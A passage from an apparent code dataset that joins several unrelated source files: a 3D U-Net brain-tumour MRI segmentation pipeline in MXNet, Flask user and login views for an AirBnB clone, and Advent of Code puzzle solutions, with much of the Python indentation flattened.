fold_dirs = np.array(self.sub_dirs)[fold_inds]
self.sub_dirs = fold_dirs
if self.means is not None: self.means = self.means[fold_inds]
if self.stds is not None: self.stds = self.stds[fold_inds]
elif split == 'test':
self._dataset_root = os.path.join(root, 'validation')
self.sub_dirs = glob.glob(self._dataset_root + '/*/')
else:
raise RuntimeError('Unknown dataset split: {}'.format(split))
def __getitem__(self, idx):
#import pdb; pdb.set_trace()
_sub_name = os.path.basename(os.path.dirname(self.sub_dirs[idx]))
# Load multichannel input data
channels = ['flair', 't1', 't1ce', 't2']
img_paths = [os.path.join(self.sub_dirs[idx], _sub_name + '_' + channel + '.nii.gz') for channel in channels]
img = []
for img_path in img_paths:
img.append(nib.load(img_path).get_fdata())
img = np.array(img)
img = np.flip(img, 2) # Correct AP orientation
# Load segmentation label map
target = None
        if self.split != 'test':
target = nib.load(os.path.join(self.sub_dirs[idx], _sub_name + '_seg.nii.gz')).get_fdata()
target[target==4] = 3 # Need to have consecutive integers [0, n_classes) for training
else:
target = np.zeros_like(img[0,:]) # dummy segmentation
target = np.expand_dims(target, axis=0)
target = np.flip(target, 2) # Correct AP orientation
# Data augmentation
if self.mode == 'train':
img, target = self._sync_transform(img, target)
elif self.mode == 'val':
img, target = self._val_sync_transform(img, target)
else:
raise RuntimeError('unknown mode for dataloader: {}'.format(self.mode))
# Routine img specific processing (normalize, etc.)
if self.transform is not None:
img = self.transform(img, self.means[idx], self.stds[idx])
return img, target
def _sync_transform(self, img, mask):
crop_size = self.crop_size
# Random LR flip
if np.random.random() < 0.5:
img = np.fliplr(img)
mask = np.fliplr(mask)
# Pad if smaller than crop_size
if any(np.array(img.shape[1:]) < crop_size):
img, mask = img_pad(img, mask, crop_size)
# Random crop if larger than crop_size
if any(np.array(img.shape[1:]) > crop_size):
img, mask = img_crop(img, mask, crop_size, self.lesion_frac)
# Random affine
if self.warp_params:
img, mask = img_warp(img, mask, self.warp_params['theta_max'],
self.warp_params['offset_max'],
self.warp_params['scale_max'],
self.warp_params['shear_max'])
# final transform to mxnet NDArray
img, mask = self._img_transform(img), self._mask_transform(mask)
return img, mask
def _val_sync_transform(self, img, mask):
crop_size = self.crop_size
# Pad if smaller than crop_size
if any(np.array(img.shape[1:]) < crop_size):
img, mask = img_pad(img, mask, crop_size)
# final transform to mxnet NDArray
img, mask = self._img_transform(img), self._mask_transform(mask)
return img, mask
def __len__(self):
return len(self.sub_dirs)
def paths(self):
return self.sub_dirs
@property
def classes(self):
"""Category names."""
return ('background', 'necrotic', 'edema', 'enhancing')
class MRISegDataset4D(MRISegDataset):
"""Dataset class with all inputs and GT seg combined into a single 4D NifTI"""
def __getitem__(self, idx):
#import pdb; pdb.set_trace()
_sub_name = os.path.basename(os.path.dirname(self.sub_dirs[idx]))
# Load multichannel input data
img_path = os.path.join(self.sub_dirs[idx], _sub_name + '_' + '4D' + '.nii.gz')
img_raw = nib.load(img_path).get_fdata()
img_raw = img_raw.transpose((3,0,1,2))
img_raw = np.flip(img_raw, 2) # Correct AP orientation
img = img_raw[0:4]
# Load segmentation label map
        if self.split != 'test':
target = img_raw[4]
target[target==4] = 3 # Need to have consecutive integers [0, n_classes) for training
else:
target = np.zeros_like(img[0,:]) # dummy segmentation
target = np.expand_dims(target, axis=0)
# Data augmentation
if self.mode == 'train':
img, target = self._sync_transform(img, target)
elif self.mode == 'val':
img, target = self._val_sync_transform(img, target)
else:
raise RuntimeError('unknown mode for dataloader: {}'.format(self.mode))
# Routine img specific processing (normalize, etc.)
if self.transform is not None:
img = self.transform(img, self.means[idx], self.stds[idx])
return img, target
def img_pad(img, mask, pad_dims):
"""Pad input image vol to given voxel dims"""
x_pad0, x_pad1, y_pad0, y_pad1, z_pad0, z_pad1 = 0,0,0,0,0,0
dims = img.shape[1:]
if dims[0] < pad_dims[0]:
x_pad0 = (pad_dims[0] - dims[0]) // 2
x_pad1 = pad_dims[0] - dims[0] - x_pad0
if dims[1] < pad_dims[1]:
y_pad0 = (pad_dims[1] - dims[1]) // 2
y_pad1 = pad_dims[1] - dims[1] - y_pad0
if dims[2] < pad_dims[2]:
z_pad0 = (pad_dims[2] - dims[2]) // 2
z_pad1 = pad_dims[2] - dims[2] - z_pad0
padding = ((0, 0), (x_pad0, x_pad1), (y_pad0, y_pad1), (z_pad0, z_pad1))
img = np.pad(img, padding, 'constant', constant_values=0)
mask = np.pad(mask, padding, 'constant', constant_values=0)
return img, mask
def img_unpad(img, dims):
"""Unpad image vol back to original input dimensions"""
pad_dims = img.shape
xmin, ymin, zmin = 0, 0, 0
if pad_dims[0] > dims[0]:
xmin = (pad_dims[0] - dims[0]) // 2
if pad_dims[1] > dims[1]:
ymin = (pad_dims[1] - dims[1]) // 2
if pad_dims[2] > dims[2]:
zmin = (pad_dims[2] - dims[2]) // 2
return img[xmin : xmin + dims[0],
ymin : ymin + dims[1],
zmin : zmin + dims[2]]
def img_crop(img, mask, crop_size, lesion_frac=0.9):
"""Sample a random image subvol/patch from larger input vol"""
# Pick the location for the patch centerpoint
if np.random.random() < lesion_frac:
good_inds = (mask.squeeze() != 0).nonzero() # sample all lesion voxels
else:
good_inds = (img[0,] != 0).nonzero() # sample all brain voxels
i_center = np.random.randint(len(good_inds[0]))
xmin = good_inds[0][i_center] - crop_size[0] // 2
ymin = good_inds[1][i_center] - crop_size[1] // 2
zmin = good_inds[2][i_center] - crop_size[2] // 2
# Make sure centerpoint is not too small
if xmin < 0: xmin = 0
if ymin < 0: ymin = 0
if zmin < 0: zmin = 0
# Make sure centerpoint is not too big
max_sizes = np.array(img.shape[1:]) - crop_size
if xmin > max_sizes[0]: xmin = max_sizes[0]
if ymin > max_sizes[1]: ymin = max_sizes[1]
if zmin > max_sizes[2]: zmin = max_sizes[2]
img = img[:, xmin : xmin + crop_size[0],
ymin : ymin + crop_size[1],
zmin : zmin + crop_size[2]]
mask = mask[:, xmin : xmin + crop_size[0],
ymin : ymin + crop_size[1],
zmin : zmin + crop_size[2]]
return img, mask
def img_warp(img, mask, theta_max=15, offset_max=0, scale_max=1.1, shear_max=0.1):
"""Training data augmentation with random affine transformation"""
# Rotation
vec = np.random.normal(0, 1, 3)
vec /= np.sqrt(np.sum(vec ** 2))
theta = np.random.uniform(- theta_max, theta_max, 1) * pi / 180
R = euler.axangle2mat(vec, theta)
# Scale/zoom
sign = -1 if np.random.random() < 0.5 else 1
Z = np.ones(3) * np.random.uniform(1, scale_max, 1) ** sign
# Translation
c_in = np.array(img.shape[1:]) // 2
offset = np.random.uniform(- offset_max, offset_max, 3)
T = - (c_in).dot((R * Z).T) + c_in + offset
# Shear
S = np.random.uniform(- shear_max, shear_max, 3)
# Compose affine
mat = affines.compose(T, R, Z, S)
# Apply warp
    img_warped = np.zeros_like(img)
    mask_warped = np.zeros_like(mask)
    for i in range(len(img)):
        img_warped[i,] = affine_transform(img[i,], mat, order=1) # Trilinear
    mask_warped[0,] = affine_transform(mask[0,], mat, order=0) # Nearest neighbor
    return img_warped, mask_warped
def brats_transform(img, means, stds):
"""Routine image-specific processing (e.g. normalization)"""
means = means.reshape(-1,1,1,1)
stds = stds.reshape(-1,1,1,1)
return (img - means) / stds
################################################################################
# U-Net
def conv_block(channels, num_convs=2, use_bias=False, use_global_stats=False, **kwargs):
"""Define U-Net convolution block"""
out = HybridSequential(prefix="")
with out.name_scope():
for _ in range(num_convs):
out.add(Conv3D(channels=channels, kernel_size=3, padding=1, use_bias=use_bias))
out.add(Activation('relu'))
out.add(BatchNorm(use_global_stats=use_global_stats)) #BN after relu seems to be the more recommended option.
return out
class UnetSkipUnit(HybridBlock):
"""Define U-Net skip block"""
def __init__(self, inner_channels, outer_channels, inner_block=None, innermost=False, outermost=False, use_dropout=False, use_bias=False, **kwargs):
super(UnetSkipUnit, self).__init__()
with self.name_scope():
self.outermost = outermost
downsample = MaxPool3D(pool_size=2, strides=2)
upsample = Conv3DTranspose(channels=outer_channels, kernel_size=2, padding=0, strides=2, use_bias=use_bias)
head = Conv3D(channels=outer_channels, kernel_size=1)
self.model = HybridSequential()
if not outermost:
self.model.add(downsample)
self.model.add(conv_block(inner_channels, use_bias=use_bias, **kwargs))
if not innermost:
self.model.add(inner_block)
self.model.add(conv_block(inner_channels, use_bias=use_bias, **kwargs))
if not outermost:
self.model.add(upsample)
if outermost:
if use_dropout:
self.model.add(Dropout(rate=0.1))
self.model.add(head)
def hybrid_forward(self, F, x):
if self.outermost:
return self.model(x)
else:
return F.concat(self.model(x), x, dim=1)
class UnetGenerator(HybridBlock):
"""Define recursive U-Net generator"""
def __init__(self, num_downs=4, classes=2, ngf=64, **kwargs):
super(UnetGenerator, self).__init__()
#Recursively build Unet from the inside out
unet = UnetSkipUnit(ngf * 2 ** num_downs, ngf * 2 ** (num_downs-1), innermost=True, **kwargs)
for depth in range(num_downs-1, 0, -1):
unet = UnetSkipUnit(ngf * 2 ** depth, ngf * 2 ** (depth-1), unet, **kwargs)
unet = UnetSkipUnit(ngf, classes, unet, outermost=True, **kwargs)
with self.name_scope():
self.model = unet
def hybrid_forward(self, F, x):
return self.model(x)
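# Hedged shape check (sizes are illustrative assumptions, not from the training script):
#   net = UnetGenerator(num_downs=4, classes=4, ngf=16)
#   net.initialize(mx.init.Xavier())
#   out = net(nd.zeros((1, 4, 64, 64, 64)))  # spatial dims must be divisible by 2**num_downs
#   out.shape  # -> (1, 4, 64, 64, 64): one logit volume per class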
################################################################################
# Inference
# ET = enhancing tumor (blue) = label 4
# TC = tumor core = ET + non-enhancing tumor/necrosis (red) = label 4 + 1
# WT = whole tumor = TC + edema (green) = label 4 + 1 + 2
def brats_validate(model, data_loader, crop_size, overlap, ctx):
"""Predict segs from val data, compare to ground truth val segs, and calculate val dice metrics"""
# Setup metric dictionary
metrics = init_brats_metrics()
# Get patch index iterator
dims = data_loader._dataset[0][1].shape[1:]
patch_iter = get_patch_iter(dims, crop_size, overlap)
# Iterate over validation subjects
for i, (data, label) in enumerate(data_loader):
# Iterate over patches
for inds in patch_iter:
# Extract patch
data_patch = get_patch(data, inds).as_in_context(ctx)
label_patch = get_patch(label, inds)
label_mask = label_patch.squeeze().asnumpy()
# Run patch through net
output_mask = get_output_mask(model, data_patch).asnumpy()
# Update metrics
for _, metric in metrics.items():
label_mask_bin = np.isin(label_mask, metric['labels'])
output_mask_bin = np.isin(output_mask, metric['labels'])
metric['tp'] += np.sum(label_mask_bin * output_mask_bin)
metric['tot'] += np.sum(label_mask_bin) + np.sum(output_mask_bin)
# Calculate overall metrics
for _, metric in metrics.items():
metric['DSC'] = 2 * metric['tp'] / metric['tot']
return metrics
def brats_predict(model, data, crop_size, overlap, n_classes, ctx):
"""Apply model to predict seg of unknown/test data"""
# Get patch index iterator
dims = data.squeeze().shape[1:]
patch_iter = get_patch_iter(dims, crop_size, overlap)
# Initialize output vol
if overlap != 0:
mask = - nd.ones(dims + (len(patch_iter), ), ctx=mx.cpu())
else:
mask = nd.zeros(dims, ctx=mx.cpu())
# Iterate over patches
for i, inds in enumerate(patch_iter):
data_patch = get_patch(data, inds).as_in_context(ctx)
output_mask = get_output_mask(model, data_patch)
mask = put_patch(mask, output_mask.as_in_context(mx.cpu()), inds, i)
mask = mask.asnumpy()
# If overlapping patches, get class prediction by majority vote (i.e. mode)
if mask.shape != dims:
mask = mode(mask, n_classes=n_classes)
mask = mask.squeeze()
return mask
def get_patch_iter(dims, crop_size, overlap):
"""Wrapper to get patch iterator"""
x_patches = get_patch_inds(dims[0], crop_size[0], overlap)
y_patches = get_patch_inds(dims[1], crop_size[1], overlap)
z_patches = get_patch_inds(dims[2], crop_size[2], overlap)
patch_iter = list(itertools.product(x_patches, y_patches, z_patches))
return patch_iter
def get_patch_inds(axis_dim, crop_size, overlap):
"""Get list of indices needed to tile patches across entire input vol"""
if crop_size > axis_dim:
i_start = [0]
i_end = [axis_dim]
else:
n_overlap = int(np.floor(crop_size * overlap))
i_start = np.arange(0, axis_dim - n_overlap, crop_size - n_overlap)
i_end = i_start + crop_size
# Scoot the last patch back so it's not hanging off the edge
if i_end[-1] > axis_dim:
i_start[-1] = axis_dim - crop_size
i_end[-1] = axis_dim
return [[x, y] for x, y in zip(i_start, i_end)]
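# Worked example (illustrative): axis_dim=155, crop_size=64, overlap=0.5
#   n_overlap = 32, i_start = [0, 32, 64, 96], i_end = [64, 96, 128, 160]
#   the last patch would overhang (160 > 155), so it is shifted back to [91, 155]
#   result: [[0, 64], [32, 96], [64, 128], [91, 155]]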
def get_patch(data, inds):
"""Extract patch data ndarray from a larger image vol"""
x_inds = inds[0]
y_inds = inds[1]
z_inds = inds[2]
data_patch = data[:, :, x_inds[0] : x_inds[1],
y_inds[0] : y_inds[1],
z_inds[0] : z_inds[1]]
return data_patch
def put_patch(data, data_patch, inds, i):
"""Place patch data ndarray back into a larger image vol"""
x_inds = inds[0]
y_inds = inds[1]
z_inds = inds[2]
if np.ndim(data_patch) == np.ndim(data):
data[x_inds[0] : x_inds[1],
y_inds[0] : y_inds[1],
z_inds[0] : z_inds[1]] = data_patch
else:
data[x_inds[0] : x_inds[1],
y_inds[0] : y_inds[1],
z_inds[0] : z_inds[1], i] = data_patch
return data
def get_output_mask(model, data):
"""Wrapper for model prediction"""
output = model(data)
output_mask = output.argmax_channel().squeeze()
return output_mask
################################################################################
# Misc helper functions
def init_brats_metrics():
"""Initialize dict for BraTS Dice metrics"""
metrics = {}
metrics['ET'] = {'labels': [3]}
metrics['TC'] = {'labels': [1, 3]}
metrics['WT'] = {'labels': [1, 2, 3]}
for _, value in metrics.items():
value.update({'tp':0, 'tot':0})
return metrics
def calc_brats_metrics(label_mask, output_mask):
"""Calculate BraTS Dice metrics (ET, TC, WT)"""
metrics = init_brats_metrics()
for _, metric in metrics.items():
label_mask_bin = np.isin(label_mask, metric['labels'])
output_mask_bin = np.isin(output_mask, metric['labels'])
metric['tp'] = np.sum(label_mask_bin * output_mask_bin)
metric['tot'] = np.sum(label_mask_bin) + np.sum(output_mask_bin)
metric['DSC'] = 2 * metric['tp'] / metric['tot']
return metrics
def dsc(truth, pred):
"""Dice Sorenson (similarity) Coefficient
(For the simple binary or overall-multiclass case)
"""
tp = truth == pred
tp = tp * (truth != 0)
return 2 * np.sum(tp) / (np.sum(truth != 0) + np.sum(pred != 0))
def get_k_folds(n, k, seed=None):
"""Simple cross-validation index generator"""
np.random.seed(seed)
x = np.arange(n)
np.random.shuffle(x)
np.random.seed()
return [x[i::k] for i in range(k)]
def mode(x, n_classes):
"""Calculate the mode (i.e. ensemble vote) over a set of overlapping prediction patches"""
dims = x.shape[:-1] + (n_classes, )
counts = np.zeros(dims)
for i in range(n_classes):
counts[..., i] = (x==i).sum(axis=x.ndim-1)
labels = counts.argmax(axis=x.ndim-1)
return labels
def get_crosshairs(mask):
"""Determine center of mass of whole tumor for crosshairs plotting"""
mask_bin = mask != 0
xmax = mask_bin.sum((1,2)).argmax() + 1 # +1 for R indexing
ymax = mask_bin.sum((0,2)).argmax() + 1
zmax = mask_bin.sum((0,1)).argmax() + 1
xyz = np.array([xmax, ymax, zmax])
return xyz
def save_params(net, best_metric, current_metric, epoch, save_interval, prefix):
"""Logic for if/when to save/checkpoint model parameters"""
if current_metric > best_metric:
best_metric = current_metric
        net.save_parameters('{:s}_best.params'.format(prefix))
with open(prefix+'_best.log', 'a') as f:
f.write('\n{:04d}:\t{:.4f}'.format(epoch, current_metric))
if save_interval and (epoch + 1) % save_interval == 0:
net.save_parameters('{:s}_{:04d}_{:.4f}.params'.format(prefix, epoch, current_metric))
return best_metric
def start_logger(args):
"""Start logging utilities for stdout, log files, and mxboard"""
logging.basicConfig()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
log_file_path = args.save_prefix + '_train.log'
log_dir = os.path.dirname(log_file_path)
if log_dir and not os.path.exists(log_dir):
os.makedirs(log_dir)
fh = logging.FileHandler(log_file_path)
logger.addHandler(fh)
logger.info(args)
logger.info('Start training from [Epoch {}]'.format(args.start_epoch))
# Setup mxboard logging
tb_dir = args.save_prefix + '_tb'
if not os.path.exists(tb_dir):
os.makedirs(tb_dir)
sw = SummaryWriter(logdir=tb_dir, flush_secs=60, verbose=False)
return logger, sw
def log_epoch_hooks(epoch, train_loss, metrics, logger, sw):
"""Epoch logging"""
DSCs = np.array([v['DSC'] for k,v in metrics.items()])
DSC_avg = DSCs.mean()
logger.info('E %d | loss %.4f | ET %.4f | TC %.4f | WT %.4f | Avg %.4f'%((epoch, train_loss) + tuple(DSCs) + (DSC_avg, )))
sw.add_scalar(tag='Dice', value=('Val ET', DSCs[0]), global_step=epoch)
sw.add_scalar(tag='Dice', value=('Val TC', DSCs[1]), global_step=epoch)
sw.add_scalar(tag='Dice', value=('Val WT', DSCs[2]), global_step=epoch)
sw.add_scalar(tag='Dice', value=('Val Avg', DSCs.mean()), global_step=epoch)
return DSC_avg
class SoftDiceLoss(gluon.loss.Loss):
"""Soft Dice loss for segmentation"""
def __init__(self, axis=-1, smooth=0, eps=1e-6, weight=None, batch_axis=0, **kwargs):
super(SoftDiceLoss, self).__init__(weight, batch_axis, **kwargs)
self._axis = axis
self._smooth = smooth
self._eps = eps
def hybrid_forward(self, F, pred, label, sample_weight=None):
# import pdb; pdb.set_trace()
pred = F.softmax(pred, self._axis)
label = F.one_hot(label, 4).transpose((0,4,1,2,3))
tp = pred * label
tp = F.sum(tp, axis=(self._axis, self._batch_axis), exclude=True, keepdims=True)
tot = pred + label
tot = F.sum(tot, axis=(self._axis, self._batch_axis), exclude=True, keepdims=True)
dsc = (2 * tp + self._smooth) / (tot + self._smooth + self._eps)
return - F.sum(dsc, axis=self._batch_axis, exclude=True)
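# --- hedged sanity-check sketch (not from the original repository) ----------
# Exercises dsc() and mode() above with tiny synthetic arrays; the expected
# values in the comments are worked out by hand. Assumes numpy is imported as
# np at the top of this file, as the functions above already require.
if __name__ == '__main__':
    truth = np.array([0, 1, 1, 2, 0, 3])
    pred = np.array([0, 1, 2, 2, 0, 3])
    # 3 matching non-background voxels out of (4 + 4) labelled voxels -> 0.75
    print(dsc(truth, pred))
    # ensemble vote over 3 overlapping prediction patches per voxel (last axis)
    votes = np.array([[0, 0, 1],
                      [2, 2, 3]])
    print(mode(votes, n_classes=4))  # -> [0 2]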
``` |
{
"source": "johncoleman83/AirBnB",
"score": 3
} |
#### File: v1/views/users.py
```python
from api.v1.views import app_views
from flask import abort, jsonify, request
from models import storage, CNC, User
from flasgger.utils import swag_from
@app_views.route('/users/', methods=['GET', 'POST'])
@swag_from('swagger_yaml/users_no_id.yml', methods=['GET', 'POST'])
def users_no_id(user_id=None):
"""
users route that handles http requests with no ID given
"""
auth_header = request.headers.get('Authorization')
if auth_header:
try:
auth_token = auth_header.split(" ")[1]
except IndexError:
abort(400, 'Bearer token malformed.')
else:
abort(400, 'Provide a valid auth token.')
resp = User.decode_auth_token(auth_token)
if 'Please log in again.' in resp:
abort(400, resp)
if request.method == 'GET':
all_users = storage.all('User')
all_users = [obj.to_json() for obj in all_users.values()]
return jsonify(all_users)
if request.method == 'POST':
req_data = request.get_json()
if req_data is None:
abort(400, 'Not a JSON')
if req_data.get('email') is None:
abort(400, 'Missing email')
if req_data.get('password') is None:
abort(400, 'Missing password')
        UserClass = CNC.get('User')
        new_object = UserClass(**req_data)
new_object.save()
return jsonify(new_object.to_json()), 201
@app_views.route('/users/<user_id>', methods=['GET', 'DELETE', 'PUT'])
@swag_from('swagger_yaml/users_id.yml', methods=['GET', 'DELETE', 'PUT'])
def user_with_id(user_id=None):
"""
users route that handles http requests with ID given
"""
auth_header = request.headers.get('Authorization')
if auth_header:
try:
auth_token = auth_header.split(" ")[1]
except IndexError:
abort(400, 'Bearer token malformed.')
else:
abort(400, 'Provide a valid auth token.')
resp = User.decode_auth_token(auth_token)
if 'Please log in again.' in resp:
abort(400, resp)
user_obj = storage.get('User', user_id)
if user_obj is None:
abort(404, 'Not found')
if request.method == 'GET':
return jsonify(user_obj.to_json())
if request.method == 'DELETE':
user_obj.delete()
del user_obj
return jsonify({}), 200
if request.method == 'PUT':
req_data = request.get_json()
if req_data is None:
abort(400, 'Not a JSON')
user_obj.bm_update(req_data)
return jsonify(user_obj.to_json()), 200
```
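The two routes above authenticate every request from a `Bearer` token in the `Authorization` header before touching storage. A hedged client-side sketch follows; the base URL, blueprint prefix, and token value are assumptions (a real token would come from the auth service), not details taken from this repository.
```python
# Sketch: exercising the users endpoints above with requests.
# The base URL/prefix and the token are placeholders; the view parses
# "Authorization: Bearer <auth_token>" via auth_header.split(" ")[1].
import requests

BASE = 'http://0.0.0.0:5001/api/v1'                  # assumed blueprint prefix
headers = {'Authorization': 'Bearer {}'.format('token-from-auth-login')}

# GET /users/ -> list of user objects
r = requests.get('{}/users/'.format(BASE), headers=headers)
print(r.status_code, r.json())

# POST /users/ -> 201 with the new user; email and password are required
payload = {'email': 'someone@example.com', 'password': 'not-a-real-password'}
r = requests.post('{}/users/'.format(BASE), json=payload, headers=headers)
print(r.status_code, r.json())
```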
#### File: AirBnB/main_app/app.py
```python
from flask import Flask, render_template, request, url_for
import json
from models import storage
import requests
from uuid import uuid4
# flask setup
app = Flask(__name__)
app.url_map.strict_slashes = False
port = 8000
host = '0.0.0.0'
# begin flask page rendering
@app.teardown_appcontext
def teardown_db(exception):
"""
after each request, this method calls .close() (i.e. .remove()) on
the current SQLAlchemy Session
"""
storage.close()
@app.route('/', methods=['GET', 'POST'])
def main_index():
"""
handles request to main index, currently a login page
"""
cache_id = uuid4()
if request.method == 'GET':
return render_template('index.html', cache_id=cache_id, message=None)
if request.method == 'POST':
email = request.form.get('email', None)
password = request.form.get('password', None)
payload = {
'email': email,
'password': password
}
headers = {
'content-type': 'application/json'
}
action = request.form.get('action')
if action == 'login':
url = 'http://0.0.0.0:5001/auth/login'
elif action == 'signup':
url = 'http://0.0.0.0:5001/auth/register'
else:
auth_token = request.form.get('logout')
return logout(auth_token=auth_token)
r = requests.post(url, headers=headers,
data=json.dumps(payload))
r_data = r.json()
if r_data.get('error'):
return render_template('index.html',
cache_id=cache_id,
message=r_data.get('error'))
auth_token = r_data.get('auth_token')
if auth_token is None:
return render_template('index.html',
cache_id=cache_id,
message=r_data.get('error'))
if 'register' in url:
signup_message = 'thank you for signing up'
return render_template('index.html',
cache_id=cache_id,
message=signup_message)
state_objs = storage.all('State').values()
states = dict([state.name, state] for state in state_objs)
amens = list(storage.all('Amenity').values())
cache_id = uuid4()
return render_template('places.html', cache_id=cache_id, states=states,
amens=amens, auth_token=auth_token)
@app.route('/logout', methods=['GET', 'POST'])
def logout(auth_token=None):
"""
handles request to main index, currently a login page
"""
if request.method == 'GET':
        cache_id = uuid4()
return render_template('404.html', cache_id=cache_id), 404
cache_id = uuid4()
if auth_token is None:
auth_token = request.form.get('logout')
headers = {
'content-type': 'application/json',
'Authorization': 'Bearer {}'.format(auth_token)
}
url = 'http://0.0.0.0:5001/auth/logout'
r = requests.post(url, headers=headers)
r_data = r.json()
if r_data.get('error'):
return render_template('index.html',
                               cache_id=cache_id,
message=r_data.get('error'))
message = 'You are now logged out.'
cache_id = uuid4()
return render_template('index.html',
cache_id=cache_id,
message=message)
@app.errorhandler(404)
def page_not_found(error):
"""
404 Error Handler
"""
cache_id = uuid4()
return render_template('404.html', cache_id=cache_id), 404
if __name__ == "__main__":
"""
MAIN Flask App
"""
app.run(host=host, port=port)
``` |
{
"source": "johncoleman83/aoc-solutions",
"score": 4
} |
#### File: python/src/day1.py
```python
import os
from shared.readdayinput import readdayinput
def first_half(dayinput):
"""
first half solver:
An opening parenthesis, (, means he should go up one floor
and a closing parenthesis, ), means he should go down one floor.
"""
result = dayinput.count('(') - dayinput.count(')')
return result
def second_half(dayinput):
"""
second half solver:
"""
i = 0
floor = 0
while i < len(dayinput):
if dayinput[i] == '(':
floor += 1
elif dayinput[i] == ')':
floor -=1
if floor == -1:
return i + 1
i += 1
return -1
def app():
"""
runs day application
"""
dayinput = readdayinput()
half_one = first_half(dayinput)
half_two = second_half(dayinput)
print(half_one, half_two)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
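The two canonical puzzle examples double as quick checks for these solvers; the import path below mirrors the file header and may need adjusting, so treat this as a hedged sketch rather than part of the original solution.
```python
# Sketch: the well-known day 1 examples run against the solvers above.
# The import path is an assumption based on the file header (python/src/day1.py).
from src.day1 import first_half, second_half

assert first_half("(()") == 1       # "(()" ends on floor 1
assert second_half("()())") == 5    # first enters the basement at character 5
```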
#### File: python/src/day2.py
```python
import os
from shared.readdayinput import readdayinput
def first_half(dayinput):
"""
first half solver:
length l, width w, and height h
find the surface area of the box, which is 2*l*w + 2*w*h + 2*h*l plus area of smallest side
"""
lines = dayinput.split('\n')
total_sq_feet = 0
for line in lines:
dimensions = map(lambda x: int(x), line.split('x'))
[l, w, h] = sorted(dimensions)
sq_feet = (2 * l * w) + (2 * w * h) + (2 * h * l) + (l * w)
total_sq_feet += sq_feet
return total_sq_feet
def second_half(dayinput):
"""
second half solver:
ribbon required to wrap a present is the shortest distance around its sides
the perfect bow is equal to the cubic feet of volume of the present
"""
lines = dayinput.split('\n')
total_ribbon_feet = 0
for line in lines:
dimensions = map(lambda x: int(x), line.split('x'))
[l, w, h] = sorted(dimensions)
side_ribbon = 2 * (l + w)
bow = l * w * h
total_ribbon_feet += (side_ribbon + bow)
return total_ribbon_feet
def app():
"""
runs day application
"""
dayinput = readdayinput()
half_one = first_half(dayinput)
half_two = second_half(dayinput)
print(half_one, half_two)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day6.py
```python
import os
from shared.readdayinput import readdayinput
class GridLights(object):
def __init__(self, v2 = False):
self.v2 = v2
self.grid = self.make_grid()
self.TASK_TO_FUNC = {
'on': self.turn_on,
'off': self.turn_off,
'toggle': self.toggle,
'on_v2': self.turn_on_v2,
'off_v2': self.turn_off_v2,
'toggle_v2': self.toggle_v2
}
def make_grid(self):
grid = {}
for y in range(1000):
for x in range(1000):
grid[(x, y)] = 0
return grid
def turn_on(self, coords):
self.grid[coords] = 1
def turn_off(self, coords):
self.grid[coords] = 0
def toggle(self, coords):
state = self.grid.get(coords, 0)
self.grid[coords] = 0 if state == 1 else 1
def turn_on_v2(self, coords):
self.grid[coords] += 1
def turn_off_v2(self, coords):
if self.grid[coords] > 0:
self.grid[coords] -= 1
def toggle_v2(self, coords):
self.grid[coords] += 2
def loop_and_do_task(self, corner_one, corner_two, f):
for y in range(corner_one[1], corner_two[1] + 1):
for x in range(corner_one[0], corner_two[0] + 1):
f((x, y))
def do_task(self, corner_one, corner_two, task):
f = self.TASK_TO_FUNC[task]
#print(corner_one, corner_two, task, f)
self.loop_and_do_task(corner_one, corner_two, f)
def string_to_coords(self, s):
coords = s.split(',')
x, y = int(coords[0]), int(coords[1])
return (x, y)
def parse_instructions_and_do(self, instruction):
instruction_list = instruction.split(' ')
corner_one = self.string_to_coords(instruction_list[-3])
corner_two = self.string_to_coords(instruction_list[-1])
task = instruction_list[0]
if task == 'turn':
task = instruction_list[1]
if self.v2 == True:
task += '_v2'
#print(task, instruction_list)
self.do_task(corner_one, corner_two, task)
def on_lights_count(self):
return sum(self.grid.values())
def off_lights_count(self):
return self.grid.values().count(0)
def first_half(dayinput):
"""
first half solver:
After following the instructions, how many lights are lit?
"""
instructions = dayinput.split('\n')
lights = GridLights()
for instruction in instructions:
lights.parse_instructions_and_do(instruction)
return lights.on_lights_count()
def second_half(dayinput):
"""
second half solver:
What is the total brightness of all lights combined after following Santa's instructions?
"""
instructions = dayinput.split('\n')
lights = GridLights(True)
for instruction in instructions:
lights.parse_instructions_and_do(instruction)
return lights.on_lights_count()
def app():
"""
runs day application
"""
dayinput = readdayinput()
half_one = first_half(dayinput)
print(half_one)
half_two = second_half(dayinput)
print(half_two)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day4.py
```python
import os
import string
from shared.readdayinput import readdayinput
testinstructions = """aaaaa-bbb-z-y-x-123[abxyz]
a-b-c-d-e-f-g-h-987[abcde]
not-a-real-room-404[oarel]
totally-real-room-200[decoy]"""
# sum of test instructions: `1514`
def sort_by_frequencies(alphas):
"""
returns new string sorted by frequencies of alphas
"""
items = []
temp = alphas[0]
for x in range(1, len(alphas)):
if alphas[x] == alphas[x - 1]:
temp += alphas[x]
else:
items.append(temp)
temp = alphas[x]
items.append(temp)
newa = ''.join([k[0] for k in sorted(items, key=lambda x: -len(x))[:5]])
return newa
def ceasarcipher(sentence, shift):
"""
uses ceasar cipher to decrypt sentence
"""
alphabet = string.ascii_lowercase * 2
newsentence = []
for word in sentence:
newword = []
for let in word:
index = ord(let) - 97
newindex = index + shift
newword.append(alphabet[newindex])
newsentence.append(''.join(newword))
return ' '.join(newsentence)
def encryptrooms(dayinput):
"""
first half solver:
encrypt real rooms and add the sum of rooms
"""
realrooms = []
cases = dayinput.split('\n')
for encrypted in cases:
e = encrypted.split('[')
checksum = e[1][:-1]
sector = int(e[0].split('-')[-1])
alphas = ''.join(sorted(''.join(e[0].split('-')[:-1])))
sortedalphas = sort_by_frequencies(alphas)
if sortedalphas == checksum:
sentence = e[0].split('-')[:-1]
decryptedsentence = ceasarcipher(sentence, sector % 26)
if 'northpole object storage' in decryptedsentence:
print(encrypted)
print(decryptedsentence, sector)
realrooms.append(sector)
print(sum(realrooms))
def app():
"""
runs day application
"""
dayinput = readdayinput()
encryptrooms(dayinput)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
```
#### File: python/src/day7.py
```python
import os
from shared.readdayinput import readdayinput
testcase = """abba[mnop]qrst
abcd[bddb]xyyx
aaaa[qwer]tyui
ioxxoj[asdfgh]zxcvbn"""
def isvalid_tls(sub, brackets):
"""
checks if substring is valid TLS IP7
"""
ip7 = False
